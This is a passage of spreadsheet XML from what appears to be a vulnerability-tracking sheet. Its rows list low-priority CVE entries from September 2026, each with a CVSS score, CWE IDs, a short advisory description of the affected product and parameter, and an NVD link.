          <t>A vulnerability was determined in projectworlds Online Examination System 1.0. The affected element is an unknown function of the file feedback.php of the component Feedback Form. Executing a manipulation of the argument Name/Subject can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M5967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86238</t>
        </is>
      </c>
    </row>
    <row r="5968">
      <c r="A5968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86241</t>
        </is>
      </c>
      <c r="C5968" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5968" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5968" s="5" t="inlineStr"/>
      <c r="F5968" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5968" s="5" t="inlineStr"/>
      <c r="H5968" s="5" t="inlineStr"/>
      <c r="I5968" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5968" s="5" t="inlineStr"/>
      <c r="K5968" s="5" t="inlineStr">
        <is>
          <t>CWE-320, CWE-321</t>
        </is>
      </c>
      <c r="L5968" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in liufee FeehiCMS up to 2.1.1. This impacts an unknown function of the file environments/prod/backend/config/main-local.php of the component Cookie Validation. This manipulation of the argument cookieValidationKey causes use of hard-coded cryptographic key
 . The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86241</t>
        </is>
      </c>
    </row>
    <row r="5969">
      <c r="A5969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86244</t>
        </is>
      </c>
      <c r="C5969" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5969" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5969" s="5" t="inlineStr"/>
      <c r="F5969" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5969" s="5" t="inlineStr"/>
      <c r="H5969" s="5" t="inlineStr"/>
      <c r="I5969" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5969" s="5" t="inlineStr"/>
      <c r="K5969" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5969" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in FastAdmin up to 1.2.0.20210401_beta. Affected is the function register/login of the file application/index/controller/User.php of the component User Controller. Such manipulation of the argument url leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. Upgrading to version 1.2.1.20210731_beta is able to address this issue. The name of the patch is b3d32e2bf3637488cfe2fc58a27a9d2475b2b51b. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="M5969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86244</t>
        </is>
      </c>
    </row>
    <row r="5970">
      <c r="A5970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86245</t>
        </is>
      </c>
      <c r="C5970" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5970" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5970" s="5" t="inlineStr"/>
      <c r="F5970" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5970" s="5" t="inlineStr"/>
      <c r="H5970" s="5" t="inlineStr"/>
      <c r="I5970" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5970" s="5" t="inlineStr"/>
      <c r="K5970" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5970" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Sales and Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/sup_transac.php. Performing a manipulation of the argument companyname results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M5970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86245</t>
        </is>
      </c>
    </row>
    <row r="5971">
      <c r="A5971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86264</t>
        </is>
      </c>
      <c r="C5971" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5971" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5971" s="5" t="inlineStr"/>
      <c r="F5971" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5971" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5971" s="5" t="inlineStr"/>
      <c r="I5971" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5971" s="5" t="inlineStr"/>
      <c r="K5971" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5971" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in sfturing ssm_pro up to 627f426331da8086ce8fff2017d65b1ddef384f8. Affected is an unknown function of the file ssm_pro/src/main/java/cn/sfturing/web/OrderController.java of the component Order Endpoint. This manipulation of the argument hospitalName/officesName/doctorName causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86264</t>
        </is>
      </c>
    </row>
    <row r="5972">
      <c r="A5972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86265</t>
        </is>
      </c>
      <c r="C5972" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5972" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5972" s="5" t="inlineStr"/>
      <c r="F5972" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5972" s="5" t="inlineStr"/>
      <c r="H5972" s="5" t="inlineStr"/>
      <c r="I5972" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5972" s="5" t="inlineStr"/>
      <c r="K5972" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5972" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/us_transac.php. Such manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M5972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86265</t>
        </is>
      </c>
    </row>
    <row r="5973">
      <c r="A5973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86267</t>
        </is>
      </c>
      <c r="C5973" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5973" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5973" s="5" t="inlineStr"/>
      <c r="F5973" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5973" s="5" t="inlineStr"/>
      <c r="H5973" s="5" t="inlineStr"/>
      <c r="I5973" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5973" s="5" t="inlineStr"/>
      <c r="K5973" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5973" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Information System Society Membership System 1.0. This issue affects some unknown processing of the file /society/check_student.php. The manipulation of the argument student_id leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M5973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86267</t>
        </is>
      </c>
    </row>
    <row r="5974">
      <c r="A5974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86269</t>
        </is>
      </c>
      <c r="C5974" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5974" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5974" s="5" t="inlineStr"/>
      <c r="F5974" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5974" s="5" t="inlineStr"/>
      <c r="H5974" s="5" t="inlineStr"/>
      <c r="I5974" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5974" s="5" t="inlineStr"/>
      <c r="K5974" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5974" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The affected element is an unknown function of the file /pages/emp_edit1.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M5974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86269</t>
        </is>
      </c>
    </row>
    <row r="5975">
      <c r="A5975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86270</t>
        </is>
      </c>
      <c r="C5975" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5975" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5975" s="5" t="inlineStr"/>
      <c r="F5975" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5975" s="5" t="inlineStr"/>
      <c r="H5975" s="5" t="inlineStr"/>
      <c r="I5975" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5975" s="5" t="inlineStr"/>
      <c r="K5975" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5975" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is an unknown function of the file /pages/settings_edit.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M5975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86270</t>
        </is>
      </c>
    </row>
    <row r="5976">
      <c r="A5976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86278</t>
        </is>
      </c>
      <c r="C5976" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5976" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5976" s="5" t="inlineStr"/>
      <c r="F5976" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5976" s="5" t="inlineStr"/>
      <c r="H5976" s="5" t="inlineStr"/>
      <c r="I5976" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5976" s="5" t="inlineStr"/>
      <c r="K5976" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5976" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. The affected element is an unknown function of the file manage_subjects.php. The manipulation of the argument msg/title/content results in cross site scripting. The attack may be performed from remote. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M5976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86278</t>
        </is>
      </c>
    </row>
    <row r="5977">
      <c r="A5977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86279</t>
        </is>
      </c>
      <c r="C5977" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5977" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5977" s="5" t="inlineStr"/>
      <c r="F5977" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5977" s="5" t="inlineStr"/>
      <c r="H5977" s="5" t="inlineStr"/>
      <c r="I5977" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5977" s="5" t="inlineStr"/>
      <c r="K5977" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L5977" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. The impacted element is an unknown function of the file auth_process.php of the component Login. This manipulation causes session fixiation. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M5977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86279</t>
        </is>
      </c>
    </row>
    <row r="5978">
      <c r="A5978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86281</t>
        </is>
      </c>
      <c r="C5978" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5978" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5978" s="5" t="inlineStr"/>
      <c r="F5978" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5978" s="5" t="inlineStr"/>
      <c r="H5978" s="5" t="inlineStr"/>
      <c r="I5978" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5978" s="5" t="inlineStr"/>
      <c r="K5978" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="L5978" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. This impacts an unknown function. Performing a manipulation results in cross-site request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M5978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86281</t>
        </is>
      </c>
    </row>
    <row r="5979">
      <c r="A5979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86285</t>
        </is>
      </c>
      <c r="C5979" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5979" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5979" s="5" t="inlineStr"/>
      <c r="F5979" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5979" s="5" t="inlineStr"/>
      <c r="H5979" s="5" t="inlineStr"/>
      <c r="I5979" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5979" s="5" t="inlineStr"/>
      <c r="K5979" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="L5979" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in BookStack up to 26.05.2. Affected by this issue is the function AttachmentController::getUpdateForm of the file app/Uploads/Controllers/AttachmentController.php of the component Attachment Edit Endpoint. The manipulation of the argument ID results in improper access controls. The attack may be launched remotely. The exploit is now public and may be used. The patch is identified as 4e406c41c4c8060a5795e74c66fb96362e54f400. It is advisable to implement a patch to correct this issue.</t>
        </is>
      </c>
      <c r="M5979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86285</t>
        </is>
      </c>
    </row>
    <row r="5980">
      <c r="A5980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86288</t>
        </is>
      </c>
      <c r="C5980" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5980" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5980" s="5" t="inlineStr"/>
      <c r="F5980" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5980" s="5" t="inlineStr"/>
      <c r="H5980" s="5" t="inlineStr"/>
      <c r="I5980" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5980" s="5" t="inlineStr"/>
      <c r="K5980" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="L5980" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ModelCloud GPTQModel up to 7.2.0. This vulnerability affects unknown code of the file gptqmodel/nn_modules/qlinear/tritonv2.py of the component Triton dequantization kernel. Such manipulation of the argument g_idx leads to out-of-bounds read. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 7.3.0 is able to resolve this issue. The name of the patch is 877c732f7d7dccd56a729844c6a5bd20f3aa8bb1. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="M5980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86288</t>
        </is>
      </c>
    </row>
    <row r="5981">
      <c r="A5981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86289</t>
        </is>
      </c>
      <c r="C5981" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5981" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5981" s="5" t="inlineStr"/>
      <c r="F5981" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5981" s="5" t="inlineStr"/>
      <c r="H5981" s="5" t="inlineStr"/>
      <c r="I5981" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5981" s="5" t="inlineStr"/>
      <c r="K5981" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="L5981" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ollama up to 0.31.1. This issue affects the function readGGUFV1String of the file fs/ggml/gguf.go of the component GGUF Decoder. Performing a manipulation results in integer overflow. The attack is possible to be carried out remotely. The exploit has been made public and could be used. Upgrading to version 0.31.2-rc1 is capable of addressing this issue. The patch is named 67b6a1c2d45321e0cb3c04a18073f9818de7724b. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="M5981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86289</t>
        </is>
      </c>
    </row>
    <row r="5982">
      <c r="A5982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86291</t>
        </is>
      </c>
      <c r="C5982" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5982" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5982" s="5" t="inlineStr"/>
      <c r="F5982" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5982" s="5" t="inlineStr"/>
      <c r="H5982" s="5" t="inlineStr"/>
      <c r="I5982" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5982" s="5" t="inlineStr"/>
      <c r="K5982" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5982" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Sales and Inventory System 1.0. This impacts an unknown function of the file /pages/us_edit1.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M5982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86291</t>
        </is>
      </c>
    </row>
    <row r="5983">
      <c r="A5983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86294</t>
        </is>
      </c>
      <c r="C5983" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5983" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5983" s="5" t="inlineStr"/>
      <c r="F5983" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5983" s="5" t="inlineStr"/>
      <c r="H5983" s="5" t="inlineStr"/>
      <c r="I5983" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5983" s="5" t="inlineStr"/>
      <c r="K5983" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5983" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Simple Traffic Offense System 1.0. Affected by this issue is some unknown functionality of the file save-settings.php of the component Settings Update Endpoint. The manipulation of the argument site_name/site_desc leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M5983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86294</t>
        </is>
      </c>
    </row>
    <row r="5984">
      <c r="A5984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86307</t>
        </is>
      </c>
      <c r="C5984" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5984" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5984" s="5" t="inlineStr"/>
      <c r="F5984" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5984" s="5" t="inlineStr"/>
      <c r="H5984" s="5" t="inlineStr"/>
      <c r="I5984" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5984" s="5" t="inlineStr"/>
      <c r="K5984" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="L5984" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86307</t>
        </is>
      </c>
    </row>
    <row r="5985">
      <c r="A5985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86309</t>
        </is>
      </c>
      <c r="C5985" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5985" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5985" s="5" t="inlineStr"/>
      <c r="F5985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5985" s="5" t="inlineStr"/>
      <c r="H5985" s="5" t="inlineStr"/>
      <c r="I5985" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5985" s="5" t="inlineStr"/>
      <c r="K5985" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5985" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. Impacted is an unknown function of the file /pages/pro_searchfrm.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M5985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86309</t>
        </is>
      </c>
    </row>
    <row r="5986">
      <c r="A5986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86310</t>
        </is>
      </c>
      <c r="C5986" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5986" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5986" s="5" t="inlineStr"/>
      <c r="F5986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5986" s="5" t="inlineStr"/>
      <c r="H5986" s="5" t="inlineStr"/>
      <c r="I5986" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5986" s="5" t="inlineStr"/>
      <c r="K5986" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5986" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. The affected element is an unknown function of the file /pages/cust_edit1.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M5986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86310</t>
        </is>
      </c>
    </row>
    <row r="5987">
      <c r="A5987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86512</t>
        </is>
      </c>
      <c r="C5987" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5987" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5987" s="5" t="inlineStr"/>
      <c r="F5987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5987" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5987" s="5" t="inlineStr"/>
      <c r="I5987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5987" s="5" t="inlineStr"/>
      <c r="K5987" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="L5987" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in java-json-tools json-patch up to 1.13. This affects the function CopyOperation.apply/MoveOperation.apply of the file src/main/java/com/github/fge/jsonpatch/CopyOperation.java of the component Copy Move Operations. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t>
        </is>
      </c>
    </row>
    <row r="5988">
      <c r="A5988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86514</t>
        </is>
      </c>
      <c r="C5988" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5988" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5988" s="5" t="inlineStr"/>
      <c r="F5988" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5988" s="5" t="inlineStr"/>
      <c r="H5988" s="5" t="inlineStr"/>
      <c r="I5988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5988" s="5" t="inlineStr"/>
      <c r="K5988" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L5988" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in vgmstream up to r2117. This issue affects the function sscanf of the file src/meta/txth.c of the component txth-txtp. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 4669d37a6af94866f6f0628678f9f90d46954e8b. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="M5988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t>
        </is>
      </c>
    </row>
    <row r="5989">
      <c r="A5989" s="5" t="inlineStr">
